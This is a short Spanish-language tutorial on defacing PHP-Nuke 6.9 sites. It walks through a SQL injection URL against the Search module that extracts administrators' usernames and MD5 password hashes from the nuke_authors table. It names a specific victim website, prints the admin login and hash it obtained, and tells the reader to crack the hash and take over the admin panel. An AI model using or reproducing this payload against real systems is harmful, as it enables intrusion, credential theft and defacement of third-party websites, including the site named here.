La explicación a continuación consiste en Nuke Inyeccion, es una clase de defaced que
permite que se agregue un administrador más a un sitio php nuke version 6.9 o menor.
Lo primero que tenemos que hacer es buscar una web victima, cuya web php sea de versión
6.9 o anterior, para la explicación se encontró la siguiente:
http://www.pasionflamenca.com/
Luego de que se encuentre el website a atacar se inserta en la URL la siguiente cadena:
******
modules.php?name=Search&type=comments&%20%20%20query=loquesea&instory=/**/UNION/**/SELECT/**/0,0,pwd,0,aid/**/FROM/**/nuke_authors
******
Quedaria así:
******
http://www.pasionflamenca.com/modules.php?name=Search&type=comments&%20%20%20query=loquesea&instory=/**/UNION/**/SELECT/**/0,0,pwd,0,aid/**/FROM/**/nuke_authors
******
Al realizar eso ella nos proporcionará el nombre de usuario y el pass encriptado en md5
de los administradores de ese website...
En el caso del que escogimos sería este:
66ad52318087f29b3bafc774c0166478
Enviado por waxx el Thursday, 01 January a las 00:59:59
Adjuntar al Artículo:
(0 responde)
Donde:
66ad52318087f29b3bafc774c0166478 (Es el "pass" del admin.php encriptado en Md5)
"waxx" (Es el "login" del admin.php de la web atacada)
Ahora buscamos un crackeador Md5, colocamos la respuesta que nos dió la técnica antes
hecha y obtendremos el password del administrador.
Editado por 3rr0r
